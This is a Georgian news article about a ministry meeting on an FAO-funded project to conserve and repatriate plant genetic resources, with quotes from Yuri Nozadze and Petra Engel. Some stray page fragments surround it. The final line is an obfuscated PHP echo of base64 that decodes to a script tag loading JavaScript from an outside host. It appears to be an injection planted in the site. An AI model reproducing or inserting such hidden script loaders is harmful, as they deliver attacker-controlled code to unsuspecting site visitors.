celsiusi
ავერსი საქკაბელი

შეხვედრაზე მხარეებმა პროექტის „მცენარეთა გენეტიკური რესურსების კონსერვაციის ფორმებს შორის in-situ, ex-situ,on-farm კავშირის გაძლიერება“ მიმდინარეობის საკითხები განიხილეს.

იური ნოზაძემ მცენარეთა გენეტიკური რესურსების აღდგენა-კონსერვაციის მნიშვნელობის შესახებ ისაუბრა და ყურადღება ამ პროცესში გარემოს დაცვისა და სოფლის მეურნეობის სამინისტროს სოფლის მეურნეობის სამეცნიერო-კვლევითი ცენტრის როლზე გაამახვილა.

„სოფლის მეურნეობის სამეცნიერო-კვლევითი ცენტრი გენეტიკური რესურსების მოძიების, დაცვისა და კონსერვაციის მიმართულებით აქტიურად მუშაობს. აღნიშნული პროექტის ფარგლებში მცენარეთა გენეტიკური რესურსების კონსერვაციის მიმართულებით ეფექტიანი თანამშრომლობა მნიშვნელოვანი მხარდაჭერაა ამ კუთხით ქვეყნის საერთაშორისო ვალდებულებების შესრულების პროცესში“, - აღნიშნა იური ნოზაძემ.

პეტრა ენგელის განცხადებით, საქართველოს სურსათის წარმოებისა და სოფლის მეურნეობისთვის მცენარეთა გენეტიკური რესურსების შესახებ საერთაშორისო ხელშეკრულებაში გაწევრიანება მნიშვნელოვანი პროგრესია, რაც, პროექტთან ერთად, ხელს შეუწყობს ქვეყნის მდიდარი მცენარეული გენეტიკური რესურსის დაცვას და მართვას.

სწავლებების და ექსპედიციების ჩატარების პარალელურად, პროექტის ძირითადი ამოცანებია საერთაშორისო გენბანკებიდან ქართული წარმოშობის მცენარეთა გენეტიკური რესურსების დაბრუნება, შეგროვილი მასალის აგრომორფოლოგიური დახასიათება; ასევე, იდენტიფიცირებული, მაღალი ხარისხის ნაციონალური კოლექციის სათესლე მასალაზე მეცნიერებისთვის და ფერმერებისთვის ხელმისაწვდომობის უზრუნველყოფა.

აღსანიშნავია, რომ პროექტი გაეროს სურსათისა და სოფლის მეურნეობის ორგანიზაცია (FAO) ფინანსური მხარდაჭერით ხორციელდება.

გარემოს დაცვისა და სოფლის მეურნეობის სამინისტროში გამართულ შეხვედრას სოფლის მეურნეობის სამეცნიერო-კვლევითი ცენტრის დირექტორი ლევან უჯმაჯურიძე და შესაბამისი სამსახურების წარმომადგენლები ესწრებოდნენ.

111
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");